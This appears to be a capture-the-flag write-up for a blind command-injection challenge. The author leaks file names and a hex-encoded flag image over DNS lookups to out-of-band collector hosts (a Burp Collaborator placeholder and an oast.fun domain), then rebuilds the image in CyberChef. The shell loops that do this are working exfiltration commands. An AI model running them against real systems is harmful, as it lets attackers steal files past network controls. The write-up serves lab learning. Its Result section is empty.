Baba Yaga's Corner

Table of Contents#

• Challenge Overview
• Discovering the Exfiltration Vector
• Listing Files via DNS
• Extracting the Image via DNS Queries
  • Encoding & Sending the Image
  • Extracting the Hex from JSON
• Reconstructing the Image
• Result

Challenge Overview#

Any command you run works, but the problem is it doesn’t return any result — it only returns successfully or Error .

Discovering the Exfiltration Vector#

That means we can’t see the flag directly, but we can send it outside. Tried wget — gives error but reaches destination. That means we can exfiltrate data over DNS.

Reference: PayloadsAllTheThings - DNS Exfiltration

Listing Files via DNS#

1
for i in $(ls) ; do host "$i.BURPCOLAB"; done

Files exfiltrated via subdomain. Flag is an image file.

Extracting the Image via DNS Queries#

But the problem is how to extract an image via DNS queries. After a little research I figured it out. Can’t send binary over DNS directly — must encode to DNS-safe charset (A-Z, 0-9, hyphens).

1
xxd -p flag.png | while read line; do
2
    nslookup "$line.yrjutqrbrnprfvffbtyzfxu3.oast.fun"
3
done

1
grep -oE '[a-f0-9]+\.yrjutqrbrnprfvffbtyzfxu3\.oast\.fun' data.json \
2
  | awk '!seen[$0]++' \
3
  | cut -d'.' -f1

Reconstructing the Image#

Paste hex into CyberChef → From Hex recipe.

CyberChef From Hex

Result#